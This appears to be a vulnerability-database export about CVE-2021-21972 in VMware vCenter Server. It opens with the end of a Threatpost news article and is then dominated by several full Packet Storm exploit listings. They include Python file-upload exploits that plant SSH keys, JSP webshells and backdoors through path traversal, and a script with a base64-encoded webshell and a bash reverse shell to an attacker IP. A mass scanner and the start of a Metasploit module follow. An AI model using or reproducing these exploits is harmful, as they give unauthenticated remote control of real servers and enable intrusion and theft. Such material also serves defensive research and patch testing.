said.\n\n\u201cThe error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,\u201d Klyuchnikov explained. \u201cAfter receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.\u201d\n\n## How is CVE-2021-21972 Exploited?\n\nIn the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company\u2019s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.\n\nAnother flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor [VMware ESXi](<https://threatpost.com/vmware-critical-flaw-esxi-hypervisor/161457/>) , the company said. [CVE-2021-21974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974>), with a CVSSv3 base score of 8.9. is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.\n\nA threat actor who\u2019s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.\n\nThe other flaw Klyuchnikov discovered\u2014tracked as [CVE-2021-21973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21973>) and the least serious of the three\u2013is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMWare. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,\u201d the company said.\n\nUnauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company\u2019s internal network and obtain information about the open ports of various services, Klyuchnikov said.\n\n## What VMware is Recommending for a Fix to the Data Center Bugs?\n\nVMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can\u2019t immediately update their systems.\n\nPositive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.\n\n**_Is your small- to medium-sized business an easy mark for attackers?_**\n\n**Threatpost WEBINAR:** _ Save your spot for \u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this **LIVE **webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-24T17:14:55", "type": "threatpost", "title": "VMWare Patches Critical RCE Flaw in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T17:14:55", "id": "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "href": "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-03-01T16:09:17", "description": "", "cvss3": {}, "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? [y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-02-24T15:05:40", "description": "", "cvss3": {}, "published": "2021-02-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "PACKETSTORM:161527", "href": "https://packetstormsecurity.com/files/161527/VMware-vCenter-6.5-7.0-Remote-Code-Execution-Proof-Of-Concept.html", "sourceData": "`#-*- coding:utf-8 -*- \nbanner = \"\"\" \n888888ba dP \n88 `8b 88 \na88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n88 `8b. 88' `88 88 Y8ooooo. 88 88 \n88 .88 88. .88 88 88 88. .88 \n88888888P `88888P8 dP `88888P' `88888P' \nooooooooooooooooooooooooooooooooooooooooooooooooooooo \n@time:2021/02/24 CVE-2021-21972.py \nC0de by NebulabdSec - @batsu \n\"\"\" \nprint(banner) \n \nimport threadpool \nimport random \nimport requests \nimport argparse \nimport http.client \nimport urllib3 \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' \n \nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\" \n \ndef get_ua(): \nfirst_num = random.randint(55, 62) \nthird_num = random.randint(0, 3200) \nfourth_num = random.randint(0, 140) \nos_type = [ \n'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', \n'(Macintosh; Intel Mac OS X 10_12_6)' \n] \nchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) \n \nua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', \n'(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] \n) \nreturn ua \n \ndef CVE_2021_21972(url): \nproxies = {\"scoks5\": \"http://127.0.0.1:1081\"} \nheaders = { \n'User-Agent': get_ua(), \n\"Content-Type\": \"application/x-www-form-urlencoded\" \n} \ntargetUrl = url + TARGET_URI \ntry: \nres = requests.get(targetUrl, \nheaders=headers, \ntimeout=15, \nverify=False, \nproxies=proxies) \n# proxies={'socks5': 'http://127.0.0.1:1081'}) \n# print(len(res.text)) \nif res.status_code == 405: \nprint(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url)) \n# print(\"[+] Command success result: \" + res.text + \"\\n\") \nwith open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw: \nfw.write(url + '\\n') \nelse: \nprint(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\") \n# except Exception as e: \n# print(e) \nexcept: \nprint(\"[-] \" + url + \" Request ERROR.\\n\") \ndef multithreading(filename, pools=5): \nworks = [] \nwith open(filename, \"r\") as f: \nfor i in f: \nfunc_params = [i.rstrip(\"\\n\")] \n# func_params = [i] + [cmd] \nworks.append((func_params, None)) \npool = threadpool.ThreadPool(pools) \nreqs = threadpool.makeRequests(CVE_2021_21972, works) \n[pool.putRequest(req) for req in reqs] \npool.wait() \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \n\"--url\", \nhelp=\"Target URL; Example:http://ip:port\") \nparser.add_argument(\"-f\", \n\"--file\", \nhelp=\"Url File; Example:url.txt\") \n# parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \") \nargs = parser.parse_args() \nurl = args.url \n# cmd = args.cmd \nfile_path = args.file \nif url != None and file_path ==None: \nCVE_2021_21972(url) \nelif url == None and file_path != None: \nmultithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161527/CVE-2021-21972.py.txt"}, {"lastseen": "2021-06-24T18:30:50", "description": "", "cvss3": {}, "published": "2021-06-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "PACKETSTORM:163268", "href": "https://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 06/21/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://kb.vmware.com/s/article/82374 \n# Software Link: https://www.vmware.com/products/vcenter-server.html \n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). \n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) \n# CVE: 2021-21972 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md \n \n#!/usr/bin/python2 \n \nimport os \nimport urllib3 \nimport argparse \nimport sys \nimport requests \nimport base64 \nimport tarfile \nimport threading \nimport time \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nmyargs=argparse.ArgumentParser() \nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True) \nmyargs.add_argument('-L','--local',help='Your local IP',required=True) \nargs=myargs.parse_args() \n \ndef getprompt(x): \nprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n \ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"): \nfullpath=\"../\" * 7 + path \nreturn fullpath.replace('\\\\','/').replace('//','/') \n \ndef createbackdoor(localip): \n# shell4.jsp \nbackdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\" \nbackdoor = base64.b64decode(backdoor).decode('utf-8') \nf = open(\"shell4.jsp\",\"w\") \nf.write(backdoor) \nf.close() \n# reverse.sh \n# After decoding overwrite string 'CUSTOM_IP' for local IP \nshell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\" \nshell=base64.b64decode(shell).decode('utf-8') \nshell=shell.replace('CUSTOM_IP',localip) \nf=open(\"reverse.sh\",\"w\") \nf.write(shell) \nf.close() \n# Move on with the payload \npayload_file=tarfile.open('payload.tar','w') \nmyroute=getpath() \ngetprompt('Adding web backdoor to archive') \npayload_file.add(\"shell4.jsp\", myroute) \nmyroute=getpath(\"tmp/reverse.sh\") \ngetprompt('Adding bash backdoor to archive') \npayload_file.add(\"reverse.sh\", myroute) \npayload_file.close() \n# cleaning up a little bit \nos.unlink(\"reverse.sh\") \nos.unlink(\"shell4.jsp\") \ngetprompt('Backdoor file just was created.') \n \ndef launchexploit(ip): \nres=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) \nif res.status_code == 200 and res.text == 'SUCCESS': \ngetprompt('Backdoor was uploaded successfully!') \nreturn True \nelse: \ngetprompt('Backdoor failed to be uploaded. Target denied access.') \nreturn False \n \ndef testshell(ip): \ngetprompt('Looking for shell...') \nshell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\" \nres=requests.get('https://' + ip + shell_path, verify=False, timeout=60) \nif res.status_code==200: \ngetprompt('Shell was found!.') \nresponse=res.text \nif True: \ngetprompt('Shell is responsive.') \ntry: \nresponse=re.findall(\"b>(.+)</\",response)[0] \nprint('$>uname -a') \nprint(response) \nexcept: \npass \nreturn True \nelse: \ngetprompt('Sorry. Shell was not found.') \nreturn False \n \ndef opendoor(url): \ntime.sleep(3) \ngetprompt('Executing command.') \nrequests.get(url, verify=False, timeout=1800) \n \ndef executebackdoor(ip, localip): \nurl=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\" \nt=threading.Thread(target=opendoor,args=(url,)) \nt.start() \ngetprompt('Setting up socket '+localip+':443') \nos.system('nc -lnvp 443') \n \nif len(sys.argv)== 1: \nmyargs.print_help(sys.stderr) \nsys.exit(1) \ncreatebackdoor(args.local) \nuploaded=launchexploit(args.target) \nif uploaded: \ntested=testshell(args.target) \nif tested: \nexecutebackdoor(args.target, args.local) \ngetprompt(\"Execution completed!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163268/vmwarevcenter70-exec.txt"}, {"lastseen": "2021-03-08T16:24:36", "description": "", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server File Upload / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161695", "href": "https://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \n# \"Shotgun\" approach to writing JSP \nRank = ManualRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated OVA file upload and path \ntraversal in VMware vCenter Server to write a JSP payload to a \nweb-accessible directory. \n \nFixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. \nNote that later vulnerable versions of the Linux appliance aren't \nexploitable via the webshell technique. Furthermore, writing an SSH \npublic key to /home/vsphere-ui/.ssh/authorized_keys works, but the \nuser's non-existent password expires 90 days after install, rendering \nthe technique nearly useless against production environments. \n \nYou'll have the best luck targeting older versions of the Linux \nappliance. The Windows target should work ubiquitously. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and exploit \n'mr_me', # Co-conspirator \n'Viss' # Co-conspirator \n], \n'References' => [ \n['CVE', '2021-21972'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'], \n['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'], \n['URL', 'https://twitter.com/jas502n/status/1364810720261496843'], \n['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'], \n['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'], \n['URL', 'https://kb.vmware.com/s/article/2143838'], \n['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html'] \n], \n'DisclosureDate' => '2021-02-23', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'win'], \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true on Windows \n'Targets' => [ \n[ \n# TODO: /home/vsphere-ui/.ssh/authorized_keys \n'VMware vCenter Server <= 6.7 Update 1b (Linux)', \n{ \n'Platform' => 'linux' \n} \n], \n[ \n'VMware vCenter Server <= 6.7 Update 3j (Windows)', \n{ \n'Platform' => 'win' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp', \n'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], \n'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint'] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index> \nOptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me \nOptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu \n]) \nend \n \ndef spray_and_pray_min \ndatastore['SprayAndPrayMin'] \nend \n \ndef spray_and_pray_max \ndatastore['SprayAndPrayMax'] \nend \n \ndef spray_and_pray_range \n(spray_and_pray_min..spray_and_pray_max).to_a \nend \n \ndef check \n# Run auxiliary/scanner/vmware/esx_fingerprint \nsuper \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \ncase res.code \nwhen 200 \n# {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"} \nexpected_keys = [ \n'States', \n'Install Progress', \n'Install Final Progress', \n'Config Progress', \n'Config Final Progress' \n] \n \nif (expected_keys & res.get_json_document.keys) == expected_keys \nreturn CheckCode::Vulnerable('Unauthenticated endpoint access granted.') \nend 